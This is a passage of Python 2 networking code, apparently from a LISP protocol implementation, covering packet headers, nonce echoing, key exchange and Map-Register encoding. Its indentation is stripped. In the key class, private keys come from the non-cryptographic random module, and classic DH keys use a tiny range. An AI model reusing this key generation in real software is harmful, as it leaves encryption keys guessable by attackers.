flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endof
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#endif
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# a echo response and some time (10 seconds) has past.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start echoing the nonce. Get a new nonce. If a echo-nonce is stored
# use the same nonce as last time regardless if we received an echo
# response. High-order bit set is telling caller to set the e-bit in
# header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long its been since last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If last received echo was a while ago and a new request-nonce was
# sent recently, say the echo happen so we can bootstrap a new request
# and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
# its a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate ECDH 25519
# cipher suite if library not installed on system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64-bits) out at at time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid are 1 of 8 values that describe the encryption key-id used for
# encrypting Map-Register messages.When the Map-Register is encrypted, the
# entire message not including the first 4 bytes are chacha20 encrypted. The
# e-bit must be set by the ETR to indicate that the Map-Register was encrypted.
#
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute hash latter.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.auth_len = socket.ntohs(self.auth_len)
